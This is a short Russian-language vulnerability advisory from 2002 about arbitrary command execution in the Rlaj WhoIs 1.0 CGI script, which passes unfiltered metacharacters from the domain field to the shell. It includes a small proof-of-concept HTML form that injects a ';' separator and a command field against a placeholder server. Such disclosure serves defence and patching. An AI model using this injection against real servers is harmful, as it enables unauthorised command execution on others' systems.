Security Lab

Выполнение произвольных команд в Rlaj WhoIs

Дата публикации:01.07.2002
Всего просмотров:764
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Rlaj WhoIs – популярный CGI скрипт для UNIX систем. WhoIs не фильтрует метасимволы в поле domain name. В результате, удаленный атакующий может выполнять произвольные команды на уязвимой системе. Пример:
<form method=post action="http://server/cgi-bin/whois/whois.cgi">
<input type=hidden name="lookup" value=";"> Cmd:
<input type="text" name="ext"><input type=submit value="Go">
</form>
Уязвимость обнаружена в Rlaj WhoIS 1.0

Zeux from sp00fed packet

Ссылки: [sp00fed packet] Whois vulnerability